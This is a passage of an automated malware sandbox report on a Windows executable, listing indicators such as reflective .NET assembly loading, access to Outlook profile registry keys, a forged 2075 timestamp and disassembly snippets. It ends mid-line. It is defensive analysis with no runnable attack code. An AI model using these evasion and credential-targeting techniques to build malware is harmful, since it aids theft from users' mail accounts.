          Source: C:\Windows\SysWOW64\cmd.exeFile written: C:\Users\user\AppData\Roaming\L6725004\L67logri.iniJump to behavior
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: uVSV3amss8eu5Sr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
          Source: uVSV3amss8eu5Sr.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: uVSV3amss8eu5Sr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.393792249.0000000007640000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: uVSV3amss8eu5Sr.exe, 00000003.00000002.430274667.0000000001940000.00000040.00000001.sdmp, cmd.exe, 0000000D.00000002.620999075.0000000002DD0000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: uVSV3amss8eu5Sr.exe, 00000003.00000002.430741082.0000000001D60000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: uVSV3amss8eu5Sr.exe, cmd.exe
          Source: Binary string: cmd.pdb source: uVSV3amss8eu5Sr.exe, 00000003.00000002.430741082.0000000001D60000.00000040.00000001.sdmp
          Source: Binary string: mscorrc.pdb source: uVSV3amss8eu5Sr.exe, 00000000.00000002.379292234.0000000006290000.00000002.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.393792249.0000000007640000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: uVSV3amss8eu5Sr.exe, MacroReader.cs.Net Code: M__________ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: JOOUCiAlE.exe.0.dr, MacroReader.cs.Net Code: M__________ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.uVSV3amss8eu5Sr.exe.160000.0.unpack, MacroReader.cs.Net Code: M__________ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.uVSV3amss8eu5Sr.exe.160000.0.unpack, MacroReader.cs.Net Code: M__________ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.2.uVSV3amss8eu5Sr.exe.f50000.1.unpack, MacroReader.cs.Net Code: M__________ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.uVSV3amss8eu5Sr.exe.f50000.0.unpack, MacroReader.cs.Net Code: M__________ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Binary contains a suspicious time stampShow sources
          Source: initial sampleStatic PE information: 0xC69EE47B [Tue Aug 6 07:25:47 2075 UTC]
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_0041CDF5 push eax; ret 3_2_0041CE48
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_0041CE42 push eax; ret 3_2_0041CE48
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_0041CE4B push eax; ret 3_2_0041CEB2
          Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exeCode function: 3_2_0041CEAC push eax; ret 3_2_0041CEB2
          Source: